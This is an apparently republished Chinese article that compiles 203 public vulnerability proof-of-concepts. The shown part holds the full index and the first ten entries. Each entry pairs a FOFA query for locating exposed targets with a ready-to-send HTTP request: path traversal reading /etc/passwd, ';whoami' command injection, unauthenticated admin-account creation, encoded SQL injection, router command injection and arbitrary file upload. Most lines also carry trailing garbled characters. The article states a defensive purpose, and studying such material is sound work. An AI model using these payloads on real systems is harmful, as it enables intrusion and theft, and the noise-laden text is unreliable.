互联网公开漏洞整理202309-202406' Q# I6 w0 s( d* H
道一安全 2024-06-05 07:41 北京5 l3 p' Q& `$ A' [" m7 O( Q
以下文章来源于网络安全新视界 ,作者网络安全新视界
3 M* M- h$ p# V: B. q% o* D+ ?7 X, \" i: R+ Q @, }8 X5 H
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。# m- m! i0 _% |2 n2 Q1 N( _$ F3 b+ ?
9 T1 }! w* n# e* S4 Y
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。( D& p4 |4 v$ P5 }5 u+ g+ I7 c
& P8 K3 y6 a+ a
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
+ n7 o8 I6 I0 t& L. n, r3 U" E4 w* S& H( k2 G1 { K0 ^
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。 x T7 J+ @# W y7 J/ T, G# Y
, M9 Z8 Z* S4 t$ J$ b3 \合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。$ B6 @8 M1 N2 R
* k5 F1 ~. a' q; s0 o9 [
* {1 A" F: ]+ G: B0 z2 F/ ^) C声明
$ X4 }9 I: S( X2 z
1 C) J$ E* Z! ^0 x3 I: Q为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
6 t7 Y( ^% B& y# A' ~% Y
4 K: e! k' ?, G7 A9 [有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。/ ?! ]7 _) N7 u% r4 ~
) u, v% L# C1 F% X. W& L# P2 \
! j$ m* e5 m5 N5 _8 s& t7 J4 {, }0 h4 u' O3 Z( z
目录' C+ D5 d- v9 ?. v4 Z5 [
0 W" |3 Y; R0 j3 O0 y( @- h2 H* b01
3 t( h4 N* A* ^0 Y( E8 M3 b
* r1 s3 J! z, H/ Y- _3 B: o; N1. StarRocks MPP数据库未授权访问
: W4 z6 m( m) E, O: a- g. M2. Casdoor系统static任意文件读取
' ~( T* R# {4 p, q3. EasyCVR智能边缘网关 userlist 信息泄漏9 D( ?9 ~! ^" K3 P `
4. EasyCVR视频管理平台存在任意用户添加
! K4 @& A& _9 Q5 U5. NUUO NVR 视频存储管理设备远程命令执行. v2 e0 b' T, D& P
6. 深信服 NGAF 任意文件读取& F& r. c$ c* n- J3 a- K+ l
7. 鸿运主动安全监控云平台任意文件下载% Z' b% [( l* w9 _ q+ @
8. 斐讯 Phicomm 路由器RCE ?/ c+ i: b0 W" U7 B- O+ C
9. 稻壳CMS keyword 未授权SQL注入: l& g3 H: H3 w9 c" ?
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传+ q4 R9 a+ [% _6 P% ^
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入3 z& h1 {; J) Q3 y
12. Jorani < 1.0.2 远程命令执行
; |) [. _" P5 [0 w$ a5 }$ ~13. 红帆iOffice ioFileDown任意文件读取/ R& W' c$ Y" m5 V6 A% n
14. 华夏ERP(jshERP)敏感信息泄露
) d3 z; n- J1 E2 s15. 华夏ERP getAllList信息泄露
9 p0 d2 v3 ?2 a b6 s16. 红帆HFOffice医微云SQL注入
! b9 i2 s) o6 W. ]( L: q# ~( E17. 大华 DSS itcBulletin SQL 注入5 l' |( ^" I6 Q6 l7 D. T
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
+ G# m' ], S0 h0 P$ l; S19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入% W5 C4 g0 U- P. ~% q/ Z" J' F
20. 大华ICC智能物联综合管理平台任意文件读取
& ? t) @6 D( a2 x$ L21. 大华ICC智能物联综合管理平台random远程代码执行 [3 F. S! x# K
22. 大华ICC智能物联综合管理平台 log4j远程代码执行: T) ~- g B6 v1 Z, P) m5 {& J
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
5 I/ @$ z+ \4 G3 `3 e# s0 C0 i24. 用友NC 6.5 accept.jsp任意文件上传
2 F+ O9 `8 N+ ]. S25. 用友NC registerServlet JNDI 远程代码执行
y7 q) Z; D; n4 l; ?: K# m& g26. 用友NC linkVoucher SQL注入: D5 d% t* X) H7 p* G* f! r$ P
27. 用友 NC showcontent SQL注入
4 Y- k) T' N6 p/ m$ N28. 用友NC grouptemplet 任意文件上传7 ~, |7 @( v# m t) c6 u d
29. 用友NC down/bill SQL注入' T, H0 C: y/ f7 N
30. 用友NC importPml SQL注入
7 q# w9 f( N0 n31. 用友NC runStateServlet SQL注入4 p! h/ n* W: G7 p# w
32. 用友NC complainbilldetail SQL注入2 Y0 e( W/ J( u0 S9 y/ }
33. 用友NC downTax/download SQL注入0 q+ K% p3 u1 r( M8 m g2 h
34. 用友NC warningDetailInfo接口SQL注入6 R: R: H' {, P
35. 用友NC-Cloud importhttpscer任意文件上传
) z/ e1 v' ~* W2 Z! d5 W3 P2 R' I2 F4 @36. 用友NC-Cloud soapFormat XXE
- I* N/ L# }2 \$ x( V37. 用友NC-Cloud IUpdateService XXE
, {: r7 Z3 K$ w7 X: P6 Y38. 用友U8 Cloud smartweb2.RPC.d XXE; H; N8 t" W$ R* w6 _ p
39. 用友U8 Cloud RegisterServlet SQL注入, f3 h0 [- C2 {
40. 用友U8-Cloud XChangeServlet XXE
9 C. R5 b7 ~1 D6 u Z" D7 J41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 D- c3 S" Z6 D( L, j' h- T42. 用友GRP-U8 SmartUpload01 文件上传
# e2 L: l' v- ~% ?3 ^5 e43. 用友GRP-U8 userInfoWeb SQL注入致RCE
+ {2 Q4 s! v; N) N* G" U* {$ \3 T2 t44. 用友GRP-U8 bx_dj_check.jsp SQL注入
. Q+ p# i' W5 M# z6 D) E' J" p) H45. 用友GRP-U8 ufgovbank XXE$ v% l1 O( O) N: B1 u' C
46. 用友GRP-U8 sqcxIndex.jsp SQL注入/ ?. k9 D4 F; q8 ?7 `$ [& _
47. 用友GRP A++Cloud 政府财务云 任意文件读取
1 f& j& L3 t" @4 c" q' u# U48. 用友U8 CRM swfupload 任意文件上传$ n# s9 M6 v; _$ x! f2 y0 i* Q9 ]
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
: ?5 O0 {) s# V# L9 S9 l6 M! g50. QDocs Smart School 6.4.1 filterRecords SQL注入! r) _) Y* A+ Z: k+ H
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入0 }& i+ K) j1 D, r4 c3 ^
52. 泛微E-Office json_common.php sql注入
. j' ?* a" G4 I, ?1 z# D' `53. 迪普 DPTech VPN Service 任意文件上传# X$ t7 p# }& B. _
54. 畅捷通T+ getstorewarehousebystore 远程代码执行1 u) d$ D0 K/ G) p& G7 A" d/ y8 b. B
55. 畅捷通T+ getdecallusers信息泄露: i8 J7 A/ f$ Q
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE: a9 J" V: O2 @) y
57. 畅捷通T+ keyEdit.aspx SQL注入
* ] d( w" Q5 H( k+ j58. 畅捷通T+ KeyInfoList.aspx sql注入
, p& H: y/ J: n5 g59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 p5 j& n ]9 l6 L60. 百卓Smart管理平台 importexport.php SQL注入
2 S6 O% j/ q7 \$ W. ^61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
2 O+ Z" \9 x% u f# \( n62. IP-guard WebServer 远程命令执行
7 O( N# C5 K( X# D' Q' p63. IP-guard WebServer任意文件读取4 [; P7 W, n; _( F5 Y
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
; a/ f# F8 B' v9 J2 n \4 \65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过+ s* a- h, `$ C5 z7 I, r
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" ^( }$ Q' W$ n4 W, q) d7 e* n
67. 万户ezOFFICE wpsservlet任意文件上传
. u1 g) H! D7 l68. 万户ezOFFICE wf_printnum.jsp SQL注入0 Z4 l v# H; H- \
69. 万户 ezOFFICE contract_gd.jsp SQL注入
7 n5 A; G2 u4 m9 t5 @% w8 S70. 万户ezEIP success 命令执行, j1 k9 L. {: m) P- U
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入( y6 O2 g/ l5 h, j* i
72. 致远OA getAjaxDataServlet XXE
$ G2 a# V, u& k5 m3 C `+ o4 @73. GeoServer wms远程代码执行
?. a7 S! |% o7 I9 K1 i W" }74. 致远M3-server 6_1sp1 反序列化RCE2 P" t3 U4 ~) V4 C w; F
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
+ s* y0 d9 m% K/ T% x( ^* b76. 新开普掌上校园服务管理平台service.action远程命令执行
1 @! \# m0 b t2 \/ Z4 |( z0 ]77. F22服装管理软件系统UploadHandler.ashx任意文件上传
" p7 |$ o$ S8 q7 g2 M* y78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
8 H' |% m+ X; M x79. BYTEVALUE 百为流控路由器远程命令执行
' }! \( ^+ K4 @: k+ d/ R. ~7 ?; k80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传8 q2 W! K! s/ Z2 c/ @
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露7 V/ `5 N8 _( C$ {+ k
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
B/ r* J0 z! l6 X83. JeecgBoot testConnection 远程命令执行$ T: @8 J: H: f1 r0 m/ B; _
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
& K: R0 l& @ d' g5 L: o85. SysAid On-premise< 23.3.36远程代码执行 B; J( b+ j. |( W' W) ^. c
86. 日本tosei自助洗衣机RCE
: ]0 n$ P: i" |! Q/ G9 |1 z# k6 Q87. 安恒明御安全网关aaa_local_web_preview文件上传. U7 Q9 r9 t7 Z9 W& r" h
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
6 w8 X, a( C) G( E. E7 X% H89. 致远互联FE协作办公平台editflow_manager存在sql注入
" ^" N9 ]- Q8 T& Q0 }4 Z90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
( F( c B1 b, O* v+ J; h91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
8 F0 R2 ?0 ]& E92. 海康威视运行管理中心session命令执行
9 q) |" }. e# [1 V93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
4 p3 D" ~+ U6 {; g, x7 x4 R& M8 M e94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
; S( w8 e! m& P) o4 x/ q95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
S, f4 l8 O4 T9 N$ X( L96. Apache OFBiz 18.12.11 groovy 远程代码执行
' F. m3 v/ Q. B, r4 ?; {/ H97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
' M$ U+ B# M8 G' O98. SpiderFlow爬虫平台远程命令执行4 l1 i) E- b/ R/ u
99. Ncast盈可视高清智能录播系统busiFacade RCE1 m1 Y& E8 d+ C" V1 b3 e2 V: Y/ }
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
1 ^/ V3 w6 A0 [; i101. ivanti policy secure-22.6命令注入
; D# F3 E% B! [# R: N6 A) @102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行4 e* a4 ?, H0 z g
103. Ivanti Pulse Connect Secure VPN XXE" s% j' P. n- _% M7 Z
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露' A" U+ e; _2 h, N
105. SpringBlade v3.2.0 export-user SQL 注入8 y% u" l4 c, _9 F# B8 M6 Q8 v
106. SpringBlade dict-biz/list SQL 注入
0 T; V; E4 S! J# z. w; e107. SpringBlade tenant/list SQL 注入" S$ t5 d6 _0 \$ k( M; Y! p
108. D-Tale 3.9.0 SSRF
3 V0 C* ~1 X+ z7 M: I109. Jenkins CLI 任意文件读取
, }! r* N0 `- J, u) N% P; K110. Goanywhere MFT 未授权创建管理员/ |# B& V6 _4 D% u- e
111. WordPress Plugin HTML5 Video Player SQL注入
1 B1 c9 j+ x/ S$ Y! e( \7 r112. WordPress Plugin NotificationX SQL 注入
: H, k. L- A2 Y7 B. y4 A113. WordPress Automatic 插件任意文件下载和SSRF
6 @( U6 g7 V" E( z, o114. WordPress MasterStudy LMS插件 SQL注入
$ s" Y8 w! S- m p! l* U' @0 P115. WordPress Bricks Builder <= 1.9.6 RCE% S, \$ H5 J9 Y/ K# T2 n; w
116. wordpress js-support-ticket文件上传
* U: a! V5 h4 j' @6 X( @117. WordPress LayerSlider插件SQL注入! O/ m2 w# O0 y) A* L+ J' Z
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
& u: {! Z7 b y: s$ q9 W119. 北京百绰智能S20后台sysmanageajax.php sql注入
( \7 [0 ~$ ?1 {: O120. 北京百绰智能S40管理平台导入web.php任意文件上传9 e0 ` J& A6 G
121. 北京百绰智能S42管理平台userattestation.php任意文件上传3 ^$ A$ D; s7 n% X4 e3 P# u, e
122. 北京百绰智能s200管理平台/importexport.php sql注入
+ e8 I$ f$ n$ `" a& D123. Atlassian Confluence 模板注入代码执行) t' H5 S* P, z2 V: p
124. 湖南建研工程质量检测系统任意文件上传
$ w7 x4 L9 L7 S& `1 H1 C125. ConnectWise ScreenConnect身份验证绕过4 `% H; h8 d; A& P5 S
126. Aiohttp 路径遍历+ L6 _; g: [- X* N: g8 F
127. 广联达Linkworks DataExchange.ashx XXE+ c9 I3 W0 e( b( V
128. Adobe ColdFusion 反序列化. j# v; b; w$ F7 Q- H6 i7 y
129. Adobe ColdFusion 任意文件读取
0 R6 u+ d! {4 Y+ P# U% }* X130. Laykefu客服系统任意文件上传5 p$ X1 t- v& I4 M$ B' a; o7 @
131. Mini-Tmall <=20231017 SQL注入# I' `+ a" z3 p& j
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过+ Y' `+ O2 T' b5 h. m9 o
133. H5 云商城 file.php 文件上传
8 u" L# G2 R( V6 [# a; }- b! R8 H134. 网康NS-ASG应用安全网关index.php sql注入 y6 t+ [7 M; k& t9 {8 K% T
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) } E4 j9 m, n9 L3 z% X2 _% ?
136. NextChat cors SSRF/ w: W: {0 K, q7 Z4 A; z9 G
137. 福建科立迅通信指挥调度平台down_file.php sql注入" z9 H/ p8 I$ z, A5 |+ g6 t
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
( i) N. O! ~" A1 p6 Z: z' v139. 福建科立讯通信指挥调度平台editemedia.php sql注入
" U$ h4 X$ z4 Y6 C5 I140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入# S7 p# ?+ e2 ~$ `
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
% b) s+ _5 ^3 B7 z' [( ^142. CMSV6车辆监控平台系统中存在弱密码7 F9 H" i# Q( |, T6 n! `. U
143. Netis WF2780 v2.1.40144 远程命令执行, X/ l& @* D2 M1 E; b- D0 M7 F
144. D-Link nas_sharing.cgi 命令注入
/ f, c4 Q7 f& t& }& x1 j145. Palo Alto Networks PAN-OS GlobalProtect 命令注入9 s1 P7 \% t# V: w+ [9 \2 g% i
146. MajorDoMo thumb.php 未授权远程代码执行2 Q$ w! b" k( N
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历1 J* z3 U# K0 i' l, F+ w
148. CrushFTP 认证绕过模板注入
* `7 M, D+ e- V149. AJ-Report开源数据大屏存在远程命令执行
0 z' q6 Z' y0 D5 `) |9 U150. AJ-Report 1.4.0 认证绕过与远程代码执行
' H! A; a3 J7 n/ H151. AJ-Report 1.4.1 pageList sql注入
+ ^; Q$ X$ ~1 L7 E) m$ ^: p152. Progress Kemp LoadMaster 远程命令执行
' Z8 m' K9 ` Z# s9 h* p1 y153. gradio任意文件读取
. y4 d. { \, M. G/ g. n154. 天维尔消防救援作战调度平台 SQL注入3 i6 q0 W) K q! K
155. 六零导航页 file.php 任意文件上传5 V. j) N6 k+ C' F' \
156. TBK DVR-4104/DVR-4216 操作系统命令注入
4 x. F' J3 ~; |157. 美特CRM upload.jsp 任意文件上传" `* r! F, a( r% v S" \
158. Mura-CMS-processAsyncObject存在SQL注入+ G. q- ^3 g* Y' Z: |. ~+ ]
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
0 q: i- {4 C9 x160. Sonatype Nexus Repository 3目录遍历与文件读取
1 B1 H% W6 N' ^- @) t161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
/ l3 u& I3 d5 a162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传8 z- {, N; R% I+ P2 ]$ x( G& u
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
! Y, ~& A% l6 Y7 O164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
! u- a# _" c' a4 y) N3 x9 H6 c& s! Z165. OrangeHRM 3.3.3 SQL 注入8 E* P5 _6 j1 |
166. 中成科信票务管理平台SeatMapHandler SQL注入
% Q2 d, C4 K0 ~6 E: C, ]167. 精益价值管理系统 DownLoad.aspx任意文件读取. {$ I& m. |+ U. N0 q1 C2 B, I! |
168. 宏景EHR OutputCode 任意文件读取
' F6 |( l t) D169. 宏景EHR downlawbase SQL注入1 P+ v' ^ ]) ?3 Y- h) \) _
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
/ l' N" Y) [! x+ t8 x" l+ T- a171. 通天星CMSV6车载定位监控平台 SQL注入+ b2 J9 R% c4 ?- e2 Q
172. DT-高清车牌识别摄像机任意文件读取- |0 s1 L, A& O
173. Check Point 安全网关任意文件读取
& B2 p8 a3 X8 T8 D174. 金和OA C6 FileDownLoad.aspx 任意文件读取
) S0 @9 d, {& Q: Q175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
C) Y( k7 n% n+ J6 _$ O176. 电信网关配置管理系统 rewrite.php 文件上传
% w8 i o* u7 ^! |8 \4 Y177. H3C路由器敏感信息泄露
7 U* m3 K: P7 B# ?# \ a3 p2 ]! F4 S178. H3C校园网自助服务系统-flexfileupload-任意文件上传1 b$ u7 ]; [$ N7 T% O* y
179. 建文工程管理系统存在任意文件读取
7 L1 g% l/ h5 {0 Z9 m180. 帮管客 CRM jiliyu SQL注入
* A' O& r' `. P2 B/ R181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入# f" K# _$ T* O& @/ G
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
2 D. R& P. U# v7 W* E: ^183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入& w: k* M4 {4 }2 `5 Y$ ^! _) F
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加4 ]& v! b5 _* [) p
185. 瑞友天翼应用虚拟化系统SQL注入1 }7 ^2 M" | u* W
186. F-logic DataCube3 SQL注入4 i+ B0 {" z6 l
187. Mura CMS processAsyncObject SQL注入% M4 k, ?; }/ l& L
188. 叁体-佳会视频会议 attachment 任意文件读取3 }1 z8 p/ J* R2 s: @ z3 \
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
; V; f1 J6 H5 Y. J) I$ s' y190. 短视频矩阵营销系统 poihuoqu 任意文件读取
k9 k& |/ ^0 p2 P( ]% `' S2 X191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入7 N" R* h- h1 ^
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
# {2 l' j& b6 {% l; R, l193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行' y! B( K/ n3 y. ]' w* M" O. V( u* z
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传% u0 p0 Q' T# k: C8 w
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行& T& @$ z3 ]- ~) F
196. 河南省风速科技统一认证平台密码重置0 V6 o/ r; t1 C) y6 @) l
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入: t/ r9 ~$ K7 |' A. `' ]+ ?
198. 阿里云盘 WebDAV 命令注入& a, k6 `3 x; W/ S/ ?
199. cockpit系统assetsmanager_upload接口 文件上传2 p" v1 z1 }! i3 r" z
200. SeaCMS海洋影视管理系统dmku SQL注入
& u, C+ F3 f' h: X* h$ x201. 方正全媒体新闻采编系统 binary SQL注入
1 @: O) g7 b) w2 `' V: x. q' H202. 微擎系统 AccountEdit任意文件上传
/ I, S: H3 E8 b) ]( O203. 红海云EHR PtFjk 文件上传6 I9 |) g2 ]; d
( l5 {! v* r: p6 P y* m
POC列表
4 Q3 G6 _! m Q \; F/ A) @% _7 K% w& V
026 M8 W, C! F7 y F" k
1 i2 _9 k9 Z4 N# \1. StarRocks MPP数据库未授权访问
8 c! z) m7 _7 B3 VFOFA :title="StarRocks"5 H1 J0 y) ~* W9 ]/ ?4 C
GET /mem_tracker HTTP/1.1# ]) L5 w6 G! l5 R8 z: P8 C6 H
Host: URL
, A! }3 ~# S; V; d( B* J. c* Q2 f* B# q" e& p+ N1 ~# K- x
% R* A m$ Z4 ?3 x) U }2. Casdoor系统static任意文件读取
q1 k9 i8 F9 NFOFA :title="Casdoor"
3 }1 ]) s& x! }+ m1 G1 z) KGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1/ k0 T( T' X1 r+ F$ K
Host: xx.xx.xx.xx:9999; P7 n7 [( c0 E/ u# X# a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 U! n+ {: i8 M9 b S* QConnection: close$ k) x& `5 \8 c
Accept: */*
% Q% x3 l9 a5 I) kAccept-Language: en# r7 g" {" y$ G# P( v0 S
Accept-Encoding: gzip4 F5 b/ A7 w- V `8 {' o" a; ~3 X3 Y
; e# i' e2 U$ \' S
/ g. ^! ?8 `' q) f; h: L# M( u! r3. EasyCVR智能边缘网关 userlist 信息泄漏
! Q* E8 T2 L+ {! n: ^8 O* g. Q8 K- IFOFA :title="EasyCVR"
# X \3 G" P' vGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
$ ^" Z4 M3 g$ V/ n7 dHost: xx.xx.xx.xx' h0 _3 r8 U$ g9 Y
0 J6 J- X8 M5 P2 `
* |1 @/ w _4 ?. I0 ?& L4. EasyCVR视频管理平台存在任意用户添加" b3 e* F+ l8 B% l9 C
FOFA :title="EasyCVR"6 j4 S) Z, @/ V% Y% G! `
* b! t8 Z# i" e
password更改为自己的密码md5
' C8 ^( J, @5 n; T! I4 L# GPOST /api/v1/adduser HTTP/1.1
: U" n& t. |( U2 G$ jHost: your-ip& o. t; B: u2 M7 y, O4 F
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
6 o' v, b x0 k a$ ~% O1 p/ Y' V" t, C) o
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1$ x" Y& q$ i2 S8 ]
- k8 m, d! t' s) O/ Y: `
- p* n# I/ _( A2 H- J# V6 K9 ~' g5. NUUO NVR 视频存储管理设备远程命令执行
, }6 f* _/ ?. x- h3 rFOFA:title="Network Video Recorder Login"6 @: h# }" U: s( N. C
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1/ T2 t+ _/ x- S8 i+ M
Host: xx.xx.xx.xx; [* H( C: ` f; y8 s8 S
) t2 R$ g3 m+ \! k! s
3 H- Y# @) p2 q; O' T( t6 v6. 深信服 NGAF 任意文件读取
$ y: T- [2 d% I+ A, H h( ~% DFOFA:title="SANGFOR | NGAF"
+ r2 N& b% d$ S: |8 S+ g; y6 \; a2 FGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1$ R- A) t5 C; |: _6 s) O- y
Host:5 q9 K( m" m3 X1 `) _ \/ ^4 j
* r9 d: D8 _# v) A& r3 J9 h
2 M3 ^, |' b8 x* L) j7. 鸿运主动安全监控云平台任意文件下载) m7 ^9 `0 D: V
FOFA:body="./open/webApi.html"; \( ], }! F, h- G! ~ n' w
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1; P$ Z; H* T Y2 A6 E9 a' {
Host: f4 Y3 x7 L4 E/ N# Z
3 m$ H& Y& }5 w0 E
, M" f: c6 ] }3 i: y" ]3 Q; c8. 斐讯 Phicomm 路由器RCE! ]& g) G: R/ W
FOFA:icon_hash="-1344736688"
, `3 o9 J8 n, B# g- q0 x: i* M4 U默认账号admin登录后台后,执行操作
/ y( ]: Z" `5 d2 l* C# EPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
. i6 ? A0 d4 z9 sHost: x.x.x.x
% g6 [% Z9 n# @; TCookie: sysauth=第一步登录获取的cookie: B3 k+ Y9 v4 P. \$ D( d& u5 G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
. k" b. w$ D; ^6 `User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36+ H- `9 c' {0 B. f; x
. f+ a) x$ }3 ~: h5 T3 Z1 C2 D------WebKitFormBoundaryxbgjoytz
' f3 O0 l, }0 j- p% x) j, CContent-Disposition: form-data; name="wifiRebootEnablestatus": ]) G# h8 |$ L( c
( { ~! M; ~! W3 ]4 d9 o
%s
5 F5 L% \7 [: o/ x------WebKitFormBoundaryxbgjoytz
0 L. {, J0 c* s, J4 {* }; zContent-Disposition: form-data; name="wifiRebootrange"* \; n) j6 Y, h _
) t. |1 m& \" s5 V" H12:00; id;
/ M$ g+ ~2 |% ]0 A% a0 ?8 u------WebKitFormBoundaryxbgjoytz
5 a# @3 ?4 j. h5 Q- t7 l; {Content-Disposition: form-data; name="wifiRebootendrange"" N+ x/ A& B- h( R
( c$ N' B7 t- h/ m
%s:
. m; v* v1 G( @: {% h------WebKitFormBoundaryxbgjoytz/ s- [/ t x0 |6 d7 C/ K
Content-Disposition: form-data; name="cururl2"
. A y9 o* U& G$ U7 [+ T1 C3 b' ?- p" `# t8 x
) u: |% G5 q3 ]" f4 O
------WebKitFormBoundaryxbgjoytz--
. x. ?& k% H* Z+ G0 f/ H
, l/ X+ c: t0 r$ L+ V; y
. K* u# N+ P0 d, u9. 稻壳CMS keyword 未授权SQL注入
$ l0 O9 R& K/ I- K1 L0 m4 \8 QFOFA:app="Doccms"7 u1 p- r: |9 t* m6 @0 V. N
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
: u7 {% u& S/ Q8 x7 Y& e2 ZHost: x.x.x.x
. x7 e u: `! O* C6 S( h" U* A A# M
/ T3 t. F( D* K+ J1 xpayload为下列语句的二次Url编码
( b9 ?' x J* I6 R) n5 R
+ Z) M3 Q5 i$ \& Q7 R' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
' A+ V/ w& Z& N0 {( v
3 g) {9 F2 [( Y h10. 蓝凌EIS智慧协同平台api.aspx任意文件上传3 h1 T+ g" n9 _% q+ F
FOFA:icon_hash="953405444"
. Y: u t! T0 H6 r
# O+ L6 w8 b/ d& d* W文件上传后响应中包含上传文件的路径6 E& I2 }( ?, Y/ |' O# A5 O3 O
POST /eis/service/api.aspx?action=saveImg HTTP/1.1! k8 a, q: Q' r2 A3 R+ N
Host: x.x.x.x:xx3 d9 \/ h! U+ ?7 k+ v X" k( i, F0 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.363 D: V5 G* o- @8 d: @0 I
Content-Length: 197. S# P5 o& B* H. I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
( T& T5 K8 \) w6 r |0 uAccept-Encoding: gzip, deflate
% }. f" E* Y% E; mAccept-Language: zh-CN,zh;q=0.93 D J$ l' B% S; c1 p; l ~
Connection: close6 g+ I! _& g9 I9 X8 l" G3 z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
$ y9 d9 m2 L6 B* _$ U8 e
: x: E- j# s, D; d) z------WebKitFormBoundaryxdgaqmqu0 f9 E+ E7 L- `, @
Content-Disposition: form-data; name="file"filename="icfitnya.txt"; t$ C; A4 {# y# e! h2 p0 [9 [3 v
Content-Type: text/html
6 ~5 P3 O. Z% A0 G$ n* o
/ k d+ |* V4 v" s# ljmnqjfdsupxgfidopeixbgsxbf
+ A/ W' c$ T- ^5 j: G$ d------WebKitFormBoundaryxdgaqmqu--
% v, z1 a3 q! o R) ?6 k/ U0 a5 \+ @
; M, H1 G7 n. B4 I11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入. v, S7 O$ f" e, x
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"% U- ?! x' V' h4 A, U! u
